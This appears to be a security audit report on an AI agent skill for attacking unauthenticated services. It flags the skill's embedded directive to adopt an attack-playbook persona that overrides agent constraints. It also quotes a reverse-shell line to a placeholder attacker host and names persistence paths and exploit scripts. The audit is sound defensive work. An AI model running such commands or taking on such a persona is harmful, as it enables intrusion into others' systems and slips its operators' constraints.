unauthorized-access-common-services

Warn

Audited by Gen Agent Trust Hub on Jul 21, 2026

Risk Level: MEDIUMPROMPT_INJECTIONCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATION
Full Analysis
  • [PROMPT_INJECTION]: The skill contains an AI LOAD INSTRUCTION directive that instructs the AI to adopt an "Expert Attack Playbook" persona for exploitation. This is intended to override default agent constraints and behavior when executing the tasks.- [COMMAND_EXECUTION]: The files provide an extensive collection of high-risk shell commands including: Persistence mechanisms like writing to /root/.ssh/authorized_keys and /var/spool/cron/root; Reverse shell payloads like bash -i >& /dev/tcp/ATTACKER/4444 0>&1; and service-specific exploitation like xp_cmdshell (MSSQL), sys_exec (MySQL), and MapReduce job submission (YARN).- [REMOTE_CODE_EXECUTION]: The skill instructs the user or agent to run unverified third-party exploitation scripts (redis-rogue-server.py, fpm.py, ajpShooter.py, gopherus.py) which lack integrity checks and could lead to arbitrary code execution.- [DATA_EXFILTRATION]: The playbook details methods for harvesting sensitive data from unauthorized services, including rsync module downloads, MongoDB dumps, and querying internal databases for credentials and files.- [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection (Category 8) because it ingests untrusted data from service responses and tool outputs (ingestion points) without boundary markers or sanitization, and has high-capability tools available (capability inventory) such as shell access and network utilities.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Jul 21, 2026, 01:24 PM
Security Audit — agent-trust-hub — unauthorized-access-common-services